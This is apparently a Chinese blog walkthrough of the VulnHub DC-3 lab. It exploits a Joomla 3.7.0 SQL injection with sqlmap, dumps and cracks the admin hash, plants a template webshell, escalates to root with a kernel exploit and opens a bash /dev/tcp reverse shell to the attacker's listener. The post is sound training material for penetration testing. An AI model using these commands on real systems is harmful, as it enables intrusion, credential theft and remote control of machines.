首页 > 其他分享 >vulnhub DC-3

vulnhub DC-3

时间:2024-07-23 22:51:16浏览次数:6  
标签:19.130 fullordering -- fields list DC 192.168 vulnhub

信息搜集

探测局域网内存活主机

nmap -sP 192.168.19.128/24

得到192.168.19.130,然后扫描探测开放的端口

nmap -p- 192.168.19.130

发现只有80端口开放,我们在浏览器中访问
image

渗透

按照上面的提示我们需要进行登录,提权等一系列操作.
先用whatweb进行一下扫描

whatweb -v 192.168.19.130

发现使用的是3.7.0版本的joomla框架.joomla是一种开源的cms框架.我们可以通过kali下的joomscan自动化工具进行版本和漏洞枚举.

joomscan -u 192.168.19.130

扫描得知admin finder(管理登录页面)为http://192.168.19.130/administrator/
我们可以使用searchsploit来进行漏洞搜索

searchsploit joomla 3.7.0

image

我们可以看到该版本存在两个漏洞,我们选择该版本特有的去打

searchsploit -p 42033

查看该exp对应的路径
image

然后直接查看该exp文件,发现给出了这个漏洞的sqlmap利用方法
image

我们把这个localhost换成靶机的ip进行扫描

sqlmap -u "http://192.168.19.130//index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

得到如下数据库

[*] information_schema
[*] joomladb
[*] mysql
[*] performance_schema
[*] sys

我们想要的是joomladb中的内容,因此我们爆破joomladb下的表

sqlmap -u "http://192.168.19.130//index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb --tables

得到了七十多个表,感觉其中的#__users表会有说法,我们爆一下其中的列

sqlmap -u "http://192.168.19.130//index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T "#__users" --columns

image

对username和password进行查看

sqlmap -u "http://192.168.19.130//index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T "#__users" -C "username,password" --dump

得到了账号和密码

username=admin,password=$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

我们不难猜出这个password是经过某种hash加密的结果.这里我们可以使用john来进行模糊哈希破解

echo '$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu' > password
john password

得到了密码为snoopy
此时我们就能从之前得到的http://192.168.19.130/administrator/进行admin登录
接下来我们需要反弹一个shell.
在Extensions->Templates->Templates中创建文件,写一个文件马
image

然后我们使用蚁剑进行连接http://192.168.19.130/templates/beez3/webshell.php.注意:其中的templates/beez3这个路径是由joomla得到的,由于我们把马写到了根目录,因此连接路径如上.

提权

查看服务器的版本信息

cat /etc/issue

image

我们使用searchexploit去寻找该版本ubuntu存在的漏洞
image

发现其中的39772是有关previlege escalation的,我们选择这个打.
我们查看这个39772号文件,发现给出了漏洞利用方法和相应的文件以及使用方法
image

我们将39772.zip通过蚁剑传到tmp下(确保一定有写文件权限),然后执行如下命令

unzip 39772.zip 
cd 39772 
tar -xvf exploit.tar 
cd ebpf_mapfd_doubleput_exploit 
./compile.sh

发现多了个doubleput文件,但是尝试执行却并没有成功获得权限.这里不知道为什么
将shell反弹到kali下,在kali监听端口

nc -lvp 2333

然后在蚁剑中去反弹shell

bash -c 'bash -i >& /dev/tcp/192.168.19.128/2333 0>&1'

这里解释一下这个反弹shell的命令:

bash -c是将后面的字符串当做bash命令执行.
bash -i启动一个交互式的shell,>&表示将标准输出和标准错误进行重定向.
/dev/tcp/192.168.19.128/2333是一个特殊的文件路径,反映了linux可以通过文件路径进行网络连接的特点.
0>&1表示将标准输入重定向到和标准输出相同的地方.

然后我们回到kali下,发现可以进行交互,运行

./doubleput

成功提权,回到root home即可查看flag.
image

存在一个疑问点,就是为什么在蚁剑下不能进行提权,但是反弹shell后反而可以

标签:19.130,fullordering,--,fields,list,DC,192.168,vulnhub
From: https://www.cnblogs.com/merak-lbz/p/18319806

相关文章

  • vulnhub DC-4
    信息搜集探测局域网存活主机nmap-sP192.168.19.128/24发现存在192.168.19.131,接着扫描端口nmap-p-192.168.19.131发现存在22端口提供ssh服务和80端口渗透在浏览器访问80端口发现是一个登录页面.尝试对admin用户进行弱密码爆破我们爆出了相当多的密码都能够进行登录......
  • vulnhub DC-2
    信息收集首先我们先使用nmap来扫描探测局域网内存货的靶机nmap-sP192.168.19.128/24发现局域网内存在192.168.19.129,接着扫描开放的端口nmap-p-192.168.19.129得到如下两个端口80/tcpopenhttp7744/tcpopenraqmon-pdu我们尝试访问192.168.19.129:80,发现跳......
  • AD模数转换(ADC)在音频处理中的详细深度讲解
    AD模数转换(Analog-to-DigitalConversion,简称ADC)是将模拟信号转换为数字信号的过程。对于音频处理来说,ADC是音频录制、数字音频处理和传输的关键步骤。以下是对AD模数转换在音频方面的详细讲解:1.ADC的基本原理ADC的过程包括以下几个步骤:采样(Sampling):将连续变化的模拟信号在时......
  • [BJDCTF2020]Easy MD5
    [BJDCTF2020]EasyMD5Step1看源代码没线索,用burp抓包看一下:发现提示,发现输入的是password要构造使password=’or‘1的形式使之形成永真的语句md5($pass,true)应该就是将pass的值md5加密后成十六进制转换成字符这时候276f7227就是十六进制的'or',只要MD5加密成276f7227+(......
  • 基于Memotrace(留痕)、jieba、wordcloud、cnsenti的微信聊天记录分析(一)(环境准备+词
     创作背景在数字化时代,社交媒体和即时通讯工具已成为人们日常生活中不可或缺的一部分。微信,作为中国最流行的即时通讯软件之一,不仅承载了人们的日常交流,更记录了无数情感的起伏与心灵的触碰。小明,一个对生活充满好奇与热情的年轻人,最近通过微信结识了一位特别的女生——小芳......
  • DC系列靶场---DC 2靶场的渗透测试(二)
    漏洞利用及探测rbash逃逸虽然我们现在已经可以执行切换路径命令了,但是发现还有是很多命令不能用。我想看看一下目标主机的所有用户,是不能执行的。那我们就用到了当前shell逃逸。第一种情况:/被允许的情况下;直接/bin/sh或/bin/bash第二种情况:能够设置PATH或SHELL时。e......
  • 开源邮箱套件介绍系列2:Roundcube webmail
    1.项目介绍项目网站:Roundcube–FreeandOpenSourceWebmailSoftwareRoundcube项目是一个免费的开源网络邮件解决方案,具有类似桌面的用户界面(Webmail),易于安装/配置,并且可以在标准的LAMPP服务器上运行。皮肤使用最新的网络标准来呈现一个功能强大且可定制的用户界面。Ro......
  • MySQL 学习笔记 基础(DQL,DCL,函数)
    SQL-DQL SQL-DQL-介绍DQL英文全称是DataQueryLanguage(数据查询语言),用来查询数据库中表的记录。查询关键字:SELECT SQL-DQL-语法SELECT字段列表FROM表名列表WHERE条件列表GROUPBY分组字段列表HAVING分组后条件列表ORDERBY排序字段......
  • (笔记)深入解读EtherCAT时钟DC同步的三种模式
     一、DC同步原理     用EtherCAT的分布式时钟(DC)功能使从站设备同步指的是,总线中的第一个DC从站被定义为基准时钟,EtherCAT主站将基准时钟的时间分配至所有的从站。因此,EtherCAT主站周期性发送一个ARMW命令,以此读取存储在时钟主站的ESC(EtherCAT从站控制器)上适当的寄存......
  • AP9235B dc-dc升压恒流电源驱动IC 2.8-30V 输出电流2A SOT23-6 白光LED驱动方案
    概述 AP9235B系列是一款固定振荡频率、恒流输出的升压型DC/DC转换器,非常适合于移动电话、PDA、数码相机等电子产品的背光驱动。输出电压可达30V,3.2V输入电压可以驱动六个串联LED,2.5V输入电压可以驱动两路并联LED(每路串联三个LED)。通过改变CE脚上PWM信号的占空比可以控制LED的......